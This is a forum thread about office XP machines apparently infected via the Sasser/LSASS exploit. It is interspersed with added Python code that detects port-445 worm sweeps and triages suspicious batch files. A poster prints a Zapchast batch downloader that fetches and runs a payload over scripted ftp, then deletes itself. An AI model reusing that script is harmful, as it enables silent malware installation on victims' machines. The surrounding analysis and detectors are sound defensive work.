Sasser: oldie but goodie

Duh_OZ

Had two dead motherboards (bad batch of Dell GX270s) replaced today
and both machines got hit with the Sasser virus. Guess I better get a
firewall to protect me from the corporate firewall? Tech did the
work so didn't have the pleasure of dealing with it.

I tried to check on windoze updates (running XP) on both the new
motherboard machine and an old one. Friggin computers can't even
connect to the update page. What a system LOL. On another box I am
currently using the multi-av tool, just to be sure all is okay :0)
 
David H. Lipman

From: "Duh_OZ" <[email protected]>

| Had two dead motherboards (bad batch of Dell GX270s) replaced today
| and both machines got hit with the Sasser virus. Guess I better get a
| firewall to protect me from the corporate firewall? Tech did the
| work so didn't have the pleasure of dealing with it.
|
| I tried to check on windoze updates (running XP) on both the new
| motherboard machine and an old one. Friggin computers can't even
| connect to the update page. What a system LOL. On another box I am
| currently using the multi-av tool, just to be sure all is okay :0)

Ozzy:

Just need to know...

Is this TRULY a Sasser worm or was it another worm that was using the buffer overflow
exploitation in LSASS via TCP port 445?
 
Duh_OZ

From: "Duh_OZ" <[email protected]>

| Had two dead motherboards (bad batch of Dell GX270s) replaced today
| and both machines got hit with the Sasser virus. Guess I better get a
| firewall to protect me from the corporate firewall? Tech did the
| work so didn't have the pleasure of dealing with it.
|
| I tried to check on windoze updates (running XP) on both the new
| motherboard machine and an old one. Friggin computers can't even
| connect to the update page. What a system LOL. On another box I am
| currently using the multi-av tool, just to be sure all is okay :0)

Ozzy:

Just need to know...

Is this TRULY a Sasser worm or was it another worm that was using the buffer overflow
exploitation in LSASS via TCP port 445?

--
Alas I wasn't in there to see anything in action but I did see he ran
the Symantec W32.Sasser removal tool (and told me both got hit with
Sasser).

The Multi-AV just finished before I left and a very quick look at the
log showed a Zapchast and a trojan downloader was on the computer
(which have a trend-micro client).

I'll look at the file names and see if they have a match on the other
computer. I *think* one was c.bat(zapchast) in the /system folder.

Now, can I install multi-av on the other computer? I was able to do
it on the one as the tech hadn't signed off (us workers have no
administrative rights on the XP boxes). It's not that I don't trust
big brother to protect me, it's I just don't trust big brother to
protect me LOL.
 
David H. Lipman

From: "Duh_OZ" <[email protected]>


| Alas I wasn't in there to see anything in action but I did see he ran
| the Symantec W32.Sasser removal tool (and told me both got hit with
| Sasser).
|
| The Multi-AV just finished before I left and a very quick look at the
| log showed a Zapchast and a trojan downloader was on the computer
| (which have a trend-micro client).
|
| I'll look at the file names and see if they have a match on the other
| computer. I *think* one was c.bat(zapchast) in the /system folder.
|
| Now, can I install multi-av on the other computer? I was able to do
| it on the one as the tech hadn't signed off (us workers have no
| administrative rights on the XP boxes). It's not that I don't trust
| big brother to protect me, it's I just don't trust big brother to
| protect me LOL.
|

The reason why I ask is that the Sasser is pretty much dead and numerous other Internet
worms have added that exploit in their infection vector arsenal.

I'd be interested in seeing those log files from the Multi AV Scanning Tool, and you can
install it, but under a limited account it will have little effectiveness.
 
Virus Guy

Duh_OZ said:
Had two dead motherboards (bad batch of Dell GX270s) replaced
today and both machines got hit with the Sasser virus.

Let me see if I understand this.

You had 2 Dell machines (new? old?) and they went bad, and you
replaced them with new machines from Dell - or you replaced their
motherboards (but still kept their original hard drives with
everything on it?)

I don't understand the relationship between the motherboard going bad
and getting hit with sasser.

Regardless of whether these were older (but updated/patched) machines, or
they were new (with a factory install of XP), wouldn't they in either
case have XP-sp2? If so, isn't SP-2 patched against sasser?
 
Duh_OZ

Let me see if I understand this.

You had 2 Dell machines (new? old?) and they went bad, and you
replaced them with new machines from Dell - or you replaced their
motherboards (but still kept their original hard drives with
everything on it?)

I don't understand the relationship between the motherboard going bad
and getting hit with sasser.

Regardless of whether these were older (but updated/patched) machines, or
they were new (with a factory install of XP), wouldn't they in either
case have XP-sp2? If so, isn't SP-2 patched against sasser?

===========
New motherboards and the first thing I asked him is how in the frick a
Sasser would hit the machines. He didn't say anything, just said he
was running the removal tool (which hopefully left a log behind).

What's even scarier (IMHO) is if indeed there was a zapchast and a
trojan downloader on the machine that the trend-micro client never
caught.

Not sure about what SP was installed. I assume they did put SP-2 out
there a few years back. I really don't use a big brother machine (the
bonus of being off site) unless I have to reach some servers in which
I need script to get to (hence I have to use an XP box).
 
Virus Guy

Duh_OZ said:
New motherboards ...

Which means they were rebuilt with their old (pre-existing) hard
drives, which means sasser was already on them.

Unless, along with the new motherboards, a new install of XP was
put on them during the system re-build, which means that either
XP-gold or XP-SP1 was used as the base install, at which point they
would be vulnerable to sasser if they were connected to your internal
LAN prior to or while being updated to SP2.

Most likely your tech was rebuilding the machines with XP-SP1 (aka
XP-2002 version) and had them connected to your internal LAN either by
mistake (or by oversight) during the rebuild, or on purpose to obtain
the SP2 patch via the network.

If your LAN is behind a firewall, then you must have one (or more)
systems on your lan that are infected by sasser (or something else)
and are constantly attempting to spread to other systems via the
sasser exploit mechanism.

Sasser info:

http://en.wikipedia.org/wiki/Sasser_worm

Internet survival time:

http://msmvps.com/blogs/harrywaldron/archive/2005/07/01/56356.aspx
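
Virus Guy's point above, that an infected box on the LAN keeps trying to spread via the tcp/445 exploit, is something a firewall log can show. The following Python is an added example, not from the thread or any of the posters: it flags sources that touch many distinct hosts on port 445 inside a short window, which is what a worm sweep looks like and what a client talking to one file server does not. The log line format, hosts and addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Syslog-style firewall export; this line format is an assumption for the example.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) TCP "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def find_445_spreaders(lines, min_targets=10, window_s=60):
    """Return {src: distinct_targets} for sources that hit at least min_targets
    distinct hosts on tcp/445 inside any window_s-second window: a worm using the
    LSASS exploit sweeps many hosts, a client keeps talking to the same server."""
    per_src = defaultdict(list)  # src -> [(timestamp, dst)]
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["dport"] != "445":
            continue  # only the SMB/LSASS port matters here
        per_src[m["src"]].append((datetime.fromisoformat(m["ts"]), m["dst"]))

    flagged = {}
    for src, events in per_src.items():
        events.sort()
        lo = 0
        for hi in range(len(events)):  # sliding time window over sorted events
            while (events[hi][0] - events[lo][0]).total_seconds() > window_s:
                lo += 1
            distinct = {dst for _, dst in events[lo:hi + 1]}
            if len(distinct) >= min_targets:
                flagged[src] = len(distinct)
                break
    return flagged


def constructed_log():
    """Constructed sample: 10.1.1.50 sweeps sixteen neighbours on tcp/445 in
    sixteen seconds, while 10.1.1.20 opens twenty sessions to one file server."""
    t0 = datetime(2006, 1, 27, 9, 0, 0)
    lines = []
    for i in range(16):
        ts = (t0 + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} DENY TCP 10.1.1.50:{1030 + i} -> 10.1.1.{60 + i}:445")
    for i in range(20):
        ts = (t0 + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} ALLOW TCP 10.1.1.20:{49152 + i} -> 10.1.1.5:445")
    return lines


print(find_445_spreaders(constructed_log()))  # {'10.1.1.50': 10}
```

The thresholds are tunable; on a real export you would feed the actual log lines and adjust the window to the scan rate you observe.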
 
Duh_OZ

Which means they were rebuilt with their old (pre-existing) hard
drives, which means sasser was already on them.

Unless, along with the new motherboards, a new install of XP was
put on them during the system re-build, which means that either
XP-gold or XP-SP1 was used as the base install, at which point they
would be vulnerable to sasser if they were connected to your internal
LAN prior to or while being updated to SP2.

Most likely your tech was rebuilding the machines with XP-SP1 (aka
XP-2002 version) and had them connected to your internal LAN either by
mistake (or by oversight) during the rebuild, or on purpose to obtain
the SP2 patch via the network.

If your LAN is behind a firewall, then you must have one (or more)
systems on your lan that are infected by sasser (or something else)
and are constantly attempting to spread to other systems via the
sasser exploit mechanism.

Sasser info:

http://en.wikipedia.org/wiki/Sasser_worm

Internet survival time:

http://msmvps.com/blogs/harrywaldron/archive/2005/07/01/56356.aspx
==========
The two machines were used for at least 2 years with no problems so I
know sasser wasn't on them. Oh to have admin rights so I could run
more tests on them ;-(
 
Virus Guy

Duh_OZ said:
The two machines were used for at least 2 years with no problems
so I know sasser wasn't on them.

But were the drives kept on those systems in their existing condition
during (and after) the motherboard replacement, or was XP re-installed
on them as part of the rebuild?

If the drives were kept "as-is", and if sasser somehow got onto them
while in the hands of the techs, then there's really only 3
explanations:

1) the XP on those drives was not brought up to SP2, and while
connected to the IT dept's LAN they became exposed to and infected by
sasser.

2) the XP on those drives was brought up to at least SP2 (if not all
available patches since and including SP2) but even so then something
new, some new variant of sasser somehow made it onto them, again
while connected to the IT dept's local LAN.

3) Sasser was on them before being serviced by the IT dept.
 
Duh_OZ

Update:
========
All the XP boxes are still on SP1; that includes the one the tech
didn't have to work on.

The file ID'ed as a zapchast (/system32/c.bat) (I typed in /system
earlier) has:
@echo off
ftp -n -v -s:.pif
wdrk32.exe
del .pif
del /F c.bat
exit /y

The wdrk32.exe is a 0 byte file so at some point must have been
cleaned or at least disinfected?

I also have this in the KAV scan log:
c:\WINDOWS\SYSTEM32\PIF~1 infected: Trojan-Downloader.BAT.Ftp.w

The only filename starting with pif was pifmgr.dll and that came up
clean (VT scan).

BTW - c.bat on all the XP boxes, dates: 08/30/2005, 11/16/2005, and
01/27/2006. The one with the 2006 date doesn't have a wdrk32.exe
file out there. I guess there must have been attacks on the system?

PS - said files weren't deleted during the scan, perhaps because I
don't have admin rights?

PSS - don't ask me to boot in safe mode, not allowed to, hell big bro
won't even let you hook up a network printer.
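
To triage a batch file like the c.bat quoted above without running it, here is an added Python example (not from the thread or any poster) that scores the traits that make it a downloader: a scripted ftp session (`-s:<file>`), execution of the fetched binary, and deletion of the ftp script and of the batch file itself. The regex heuristics and the benign second sample are assumptions; the c.bat contents and its system32 path are those given in the post.

```python
import re
from typing import Dict, List, Optional

# Copied from the thread: the c.bat the KAV/Multi-AV scan flagged as Zapchast.
# The second file is a constructed benign batch script for contrast.
SAMPLES = {
    r"c:\WINDOWS\system32\c.bat": (
        "@echo off\nftp -n -v -s:.pif\nwdrk32.exe\ndel .pif\ndel /F c.bat\nexit /y\n"
    ),
    r"c:\scripts\backup.bat": "@echo off\nxcopy /E /Y c:\\data d:\\backup\nexit\n",
}

# ftp driven by a script file: "-s:<file>" feeds commands non-interactively
FTP_SCRIPT = re.compile(r"^\s*ftp(?:\.exe)?\b.*?-s:(?P<script>\S+)", re.IGNORECASE)
# a bare executable name on its own line (what running the downloaded payload looks like)
EXEC_LINE = re.compile(r"^\s*(?:start\s+)?(?P<exe>[\w~.-]+\.(?:exe|com|scr|pif))\s*$", re.I)
# del with optional switches, capturing the file removed
DEL_LINE = re.compile(r"^\s*del\b(?:\s+/\w+)*\s+(?P<target>\S+)", re.IGNORECASE)


def analyse_batch(path: str, text: str) -> Optional[Dict]:
    """Flag batch files that fetch something with a scripted ftp session, run it,
    then remove the ftp script and themselves. Returns None when no ftp script
    is used; otherwise a finding whose score counts the matching traits (1-4)."""
    script, executed, deleted = None, [], []
    for line in text.splitlines():
        if m := FTP_SCRIPT.match(line):
            script = m["script"]
        elif m := EXEC_LINE.match(line):
            executed.append(m["exe"])
        elif m := DEL_LINE.match(line):
            deleted.append(m["target"].lower())
    if script is None:
        return None
    own_name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    traits = {
        "ftp_script": script,
        "runs_downloaded_binary": bool(executed),
        "deletes_ftp_script": script.lower() in deleted,
        "deletes_self": own_name in deleted,
    }
    score = 1 + sum(1 for k in traits if k != "ftp_script" and traits[k])
    return {"path": path, "executed": executed, "score": score, **traits}


def scan(samples: Dict[str, str]) -> List[Dict]:
    """Run analyse_batch over a mapping of path -> file contents."""
    return [f for p, t in samples.items() if (f := analyse_batch(p, t)) is not None]
```

A score of 4 is the full pattern seen in the post; a lone scripted ftp call (score 1) is common in legitimate admin scripts and needs a look rather than an alarm.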